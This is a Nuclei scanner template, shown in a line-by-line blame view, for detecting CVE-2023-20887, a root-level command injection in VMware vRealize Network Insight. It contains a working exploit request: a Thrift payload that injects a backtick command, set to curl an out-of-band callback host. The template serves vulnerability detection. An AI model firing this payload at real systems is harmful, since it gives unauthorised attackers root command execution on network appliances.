2023-06-13 15:38:36 +00:00
id : CVE-2023-20887
2023-06-13 14:24:50 +00:00
info :
2023-06-13 15:38:36 +00:00
name : VMware VRealize Network Insight - Remote Code Execution
2023-06-13 14:24:50 +00:00
author : sinsinology
2023-06-13 16:07:28 +00:00
severity : critical
2023-06-13 14:24:50 +00:00
description : |
2023-06-13 16:38:59 +00:00
VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are
vulnerable.
2023-06-13 14:24:50 +00:00
reference :
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
- https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
2023-06-13 15:38:36 +00:00
- https://github.com/sinsinology/CVE-2023-20887
2023-08-31 11:46:18 +00:00
- http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html
2023-06-13 16:07:28 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2023-06-13 16:07:28 +00:00
cvss-score : 9.8
cve-id : CVE-2023-20887
2023-07-11 19:49:27 +00:00
cwe-id : CWE-77
2023-08-31 11:46:18 +00:00
epss-score : 0.96066
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.99263
2023-06-13 14:24:50 +00:00
metadata :
2023-06-13 15:38:36 +00:00
max-request : 1
2023-06-13 16:07:28 +00:00
verified : true
2023-06-13 14:24:50 +00:00
shodan-query : title:"VMware vRealize Network Insight"
fofa-query : title="VMware vRealize Network Insight"
2023-07-11 19:49:27 +00:00
vendor : vmware
product : vrealize_network_insight
tags : cve,cve2023,vmware,rce,msf,vrealize,insight,oast,kev
2023-06-14 03:58:59 +00:00
variables :
cmd : "curl {{interactsh-url}}"
2023-06-13 14:24:50 +00:00
http :
- raw :
2023-06-13 16:07:28 +00:00
- |
2023-06-13 14:24:50 +00:00
POST /saas./resttosaasservlet HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-thrift
2023-06-14 03:58:59 +00:00
[ 1 , "createSupportBundle" , 1 , 0 , {"1" : {"str" : "1111" }, "2" : {"str" : "`{{cmd}}`" }, "3" : {"str" : "value3" }, "4" : {"lst" : [ "str" , 2 , "AAAA" , "BBBB" ] }}]
2023-06-13 14:24:50 +00:00
matchers-condition : and
matchers :
- type : word
2023-06-13 18:02:04 +00:00
part : body
2023-06-13 14:24:50 +00:00
words :
2023-06-13 18:02:04 +00:00
- '{"rec":'
2023-06-13 14:24:50 +00:00
- type : word
2023-06-13 18:02:04 +00:00
part : header
2023-06-13 14:24:50 +00:00
words :
2023-06-13 18:02:04 +00:00
- "application/x-thrift"
2023-06-13 14:24:50 +00:00
2023-06-13 18:02:04 +00:00
- type : word
part : body
2023-07-11 19:49:27 +00:00
negative : true
2023-06-13 18:02:04 +00:00
words :
- "Provided invalid node Id"
- "Invalid nodeId"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200